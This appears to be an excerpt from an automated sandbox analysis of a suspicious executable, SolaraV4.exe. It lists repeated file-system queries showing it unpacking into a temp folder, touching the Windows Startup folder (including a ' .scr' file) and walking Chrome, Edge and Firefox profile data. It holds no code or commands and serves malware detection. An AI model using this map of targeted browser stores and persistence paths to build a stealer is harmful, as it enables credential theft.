Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\dcd18195-cd9a-4824-b300-56e602ae372f VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation Jump to behavior
